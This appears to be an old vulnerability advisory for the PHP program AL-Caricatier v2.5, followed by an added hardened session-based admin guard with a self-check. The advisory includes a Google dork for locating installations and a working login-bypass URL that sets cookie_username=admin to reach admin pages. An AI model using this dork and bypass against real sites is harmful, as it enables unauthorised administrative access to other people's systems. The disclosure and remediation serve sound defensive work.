Vulnerability in AL-Caricatier, V.2.5
Hello...
I found a vulnerability in a program called AL-Caricatier. It's an
Arabic program.
site:
http://www.php-ar.com
Vulnerability:
Login Bypass
GoogleDork:
inurl:view_caricatier.php
Vulnerability in an included file called ss.php, which resides in
the admin directory...
if($cookie_username){
    echo "";
}else{
    echo "<font face='tahoma' size='2'>You Didn't Sign in لم تقم بتسجيل الدخول</b>";
    echo "<meta http-equiv='Refresh' content='1; url=admin_login.php'>";
    EXIT;
}
The admin directory is protected by user and password, but you can
bypass them by going to this link:
www.victim.com/view_caricatier.php
To bypass:
www.victim.com/admin/welcome.php?cookie_username=admin
or any of the admin files instead of welcome.php,
like:
add-flashFile.php
caricatier_add.php
delete_cat.php
and you are in the admin interface...
--
(r).....Now I Am Become Death....The Destroyer Of Worlds.....The Creator oF
Genuises....(c)
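The check quoted in the post trusts `$cookie_username`, a variable the request itself can populate. The `?cookie_username=admin` URL implies request parameters are imported into global scope (for example via `register_globals`; that mechanism is an assumption, the post does not name it). A hardened guard for the same included file, as an added example that is not AL-Caricatier's code; the session keys `admin_user` and `login_time` and all function names are hypothetical:

```php
<?php
// Added example: hardened replacement for the admin include guard (ss.php).
// Identity comes only from server-side session state, never from a
// request-supplied variable. All names here are hypothetical.
declare(strict_types=1);

// Pure decision function: the session array is passed in explicitly, so no
// global imported from the query string or a cookie can influence it.
function is_admin_authenticated(array $session, int $maxAge = 1800): bool
{
    return isset($session['admin_user'], $session['login_time'])
        && is_string($session['admin_user'])
        && $session['admin_user'] !== ''
        && (time() - (int) $session['login_time']) < $maxAge;
}

// Called by admin_login.php only after the password has been verified
// (e.g. with password_verify()) and the session has been started.
function mark_admin_logged_in(string $username): void
{
    session_regenerate_id(true);            // defeat session fixation
    $_SESSION['admin_user'] = $username;
    $_SESSION['login_time'] = time();
}

// Guard for the top of every admin file (welcome.php, delete_cat.php, ...).
function require_admin(): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start(['cookie_httponly' => true, 'use_strict_mode' => true]);
    }
    if (!is_admin_authenticated($_SESSION)) {
        header('Location: admin_login.php', true, 302);
        exit;                               // stop before any admin code runs
    }
}

// Constructed self-check: the request parameter from the post must not matter.
$_GET['cookie_username'] = 'admin';
$cases = [
    'no session'      => [[], false],
    'stale session'   => [['admin_user' => 'admin', 'login_time' => time() - 7200], false],
    'empty username'  => [['admin_user' => '', 'login_time' => time()], false],
    'valid session'   => [['admin_user' => 'admin', 'login_time' => time()], true],
];
foreach ($cases as $name => [$session, $expected]) {
    if (is_admin_authenticated($session) !== $expected) {
        throw new RuntimeException("guard check failed: $name");
    }
}
```

Because the guard redirects with a header and `exit` before producing output, none of the admin files listed in the post run past it without a valid session.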